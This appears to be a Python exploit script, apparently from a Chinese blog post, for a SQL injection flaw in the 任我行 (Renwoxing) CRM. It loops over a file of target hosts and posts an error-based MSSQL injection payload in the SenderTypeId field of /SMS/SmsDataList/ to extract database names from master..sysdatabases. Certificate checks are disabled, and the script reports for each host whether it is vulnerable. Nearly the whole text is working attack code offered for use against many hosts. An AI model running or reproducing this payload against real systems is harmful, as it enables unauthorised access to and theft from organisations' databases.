# -*-coding:utf-8 -*-
import requests
with open('任我行-CRM.txt', 'r') as file:
for line in file:
line = line.replace('\n', '')
url = f"{line}/SMS/SmsDataList/?pageIndex=1&pageSize=30"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0",
"Accept": "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",
"Content-type": "application/x-www-form-urlencoded",
"Connection": "close"}
data = {"Keywords": "", "StartSendDate": "2020-06-17", "EndSendDate": "2020-09-17",
"SenderTypeId": "00000000' AND 8285 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(118)+CHAR(118)+CHAR(113)+(SELECT TOP 1 SUBSTRING((ISNULL(CAST(name AS NVARCHAR(4000)),CHAR(32))),1,1024) FROM master..sysdatabases WHERE ISNULL(CAST(name AS NVARCHAR(4000)),CHAR(32)) NOT IN (SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases ORDER BY name) ORDER BY name)+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(118)+CHAR(113)))-- dVlE"}
requests.packages.urllib3.disable_warnings()
response = requests.post(url=url, headers=headers, data=data, verify=False)
if "qpvvq" in response.text:
print(f"{line}存在SQL注入")
else:
print(f"{line}不存在SQL注入")
任我行-CRM SQL注入
最新推荐文章于 2024-10-10 17:26:01 发布